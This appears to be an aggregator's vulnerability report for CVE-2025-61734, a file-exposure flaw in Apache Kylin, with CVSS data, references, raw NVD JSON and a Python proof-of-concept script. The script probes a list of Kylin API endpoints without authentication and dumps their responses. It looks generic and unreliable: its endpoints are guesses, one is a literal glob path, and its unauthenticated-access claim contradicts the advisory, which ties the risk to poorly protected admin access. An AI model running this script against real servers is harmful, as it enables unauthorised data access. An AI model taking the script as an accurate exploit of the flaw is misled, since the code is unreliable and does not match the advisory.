Security Vulnerability Report
CVE-2025-61734 (CVSS 7.5 HIGH)

Published: 2025-10-02 10:15:40
Last Modified: 2025-11-04 22:16:37

Description

Files or Directories Accessible to External Parties vulnerability in Apache Kylin. You are fine as long as Kylin's system and project admin access is well protected. This issue affects Apache Kylin: from 4.0.0 through 5.0.2. Users are recommended to upgrade to version 5.0.3, which fixes the issue.

Weakness: CWE-552 (Files or Directories Accessible to External Parties)

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* - VULNERABLE
Apache Kylin >= 4.0.0 and <= 5.0.2 (fixed in 5.0.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61734 - Apache Kylin File/Directory Access Vulnerability PoC
# This PoC demonstrates how an unauthenticated attacker can access
# restricted files or directories through vulnerable API endpoints
import requests
import sys

TARGET_HOST = "http://target-kylin-server:7070"


def exploit_file_access(endpoint_path):
    """
    Attempt to access restricted files/directories via vulnerable API endpoint
    """
    url = f"{TARGET_HOST}{endpoint_path}"
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; SecurityResearch/1.0)",
        "Accept": "application/json, text/plain, */*",
    }
    try:
        # Send unauthenticated request to vulnerable endpoint
        response = requests.get(url, headers=headers, timeout=10)
        if response.status_code == 200:
            print(f"[+] Successfully accessed: {endpoint_path}")
            print(f"[+] Response status: {response.status_code}")
            print("[+] Response body (first 500 chars):")
            print(response.text[:500])
            return response.text
        else:
            print(f"[-] Access denied or endpoint not found: {endpoint_path}")
            print(f"[-] Status code: {response.status_code}")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to {url}: {e}")
        return None


def main():
    # Common vulnerable endpoints in Apache Kylin
    vulnerable_endpoints = [
        "/kylin/api/admin/config",   # Admin configuration
        "/kylin/api/diag",           # Diagnostic information
        "/kylin/api/files/**",       # File access
        "/kylin/api/projects",       # Project listing
        "/kylin/api/user",           # User information
        "/kylin/api/resource/path",  # Resource path access
        "/kylin/api/tables",         # Table metadata
    ]

    print("=" * 60)
    print("CVE-2025-61734 - Apache Kylin File Access PoC")
    print("=" * 60)
    print(f"[*] Target: {TARGET_HOST}")
    print()

    for endpoint in vulnerable_endpoints:
        print(f"[*] Probing endpoint: {endpoint}")
        result = exploit_file_access(endpoint)
        if result:
            print("[+] Sensitive data potentially exposed!")
        print()


if __name__ == "__main__":
    # Optional first argument overrides the default target base URL
    if len(sys.argv) > 1:
        TARGET_HOST = sys.argv[1]
    main()
```

References

https://lists.apache.org/thread/z705g7sn3g0bkchlqbo1hz1tyqorn4d2 (Issue Tracking, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2025/09/30/8
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-61734",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-02T10:15:40.100",
    "lastModified": "2025-11-04T22:16:36.973",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Files or Directories Accessible to External Parties vulnerability in Apache Kylin.\n You are fine as long as the Kylin's system and project admin access is well protected.\n\nThis issue affects Apache Kylin: from 4.0.0 through 5.0.2.\n\nUsers are recommended to upgrade to version 5.0.3, which fixes the issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-552"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "4.0.0",
                "versionEndExcluding": "5.0.3",
                "matchCriteriaId": "0732C89B-68F0-406A-977F-C75F554B17DD"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://lists.apache.org/thread/z705g7sn3g0bkchlqbo1hz1tyqorn4d2",
        "source": "[email protected]",
        "tags": [
          "Issue Tracking",
          "Vendor Advisory"
        ]
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2025/09/30/8",
        "source": "af854a3a-2127-422b-91ae-364da2661108"
      }
    ]
  }
}
```